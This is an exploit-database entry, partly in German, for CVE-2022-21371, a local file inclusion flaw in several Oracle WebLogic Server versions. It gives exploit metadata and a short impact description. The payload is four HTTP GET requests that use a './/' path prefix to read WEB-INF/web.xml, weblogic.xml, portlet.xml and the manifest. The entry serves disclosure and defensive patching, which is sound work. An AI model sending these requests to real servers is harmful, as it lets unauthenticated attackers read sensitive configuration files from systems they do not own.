
Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Lokale Dateieinbindung
Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Lokale Dateieinbindung
# Exploit Title: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
# Tested on: Windows Server 2019
# CVE : CVE-2022-21371
Sicherheitslücke im Oracle WebLogic Server Produkt von Oracle Fusion Middleware (Komponente: Web Container).
Betroffen sind die Versionen 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 und 14.1.1.0.0.
Die leicht ausnutzbare Sicherheitslücke ermöglicht es einem nicht authentifizierten Angreifer mit Netzwerkzugriff über HTTP, den Oracle WebLogic Server zu kompromittieren.
Erfolgreiche Angriffe auf diese Sicherheitslücke können zu unbefugtem Zugriff auf kritische Daten oder vollständigem Zugriff auf alle zugänglichen Daten des Oracle WebLogic Servers führen.
GET .//META-INF/MANIFEST.MF
GET .//WEB-INF/web.xml
GET .//WEB-INF/portlet.xml
GET .//WEB-INF/weblogic.xml
von https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786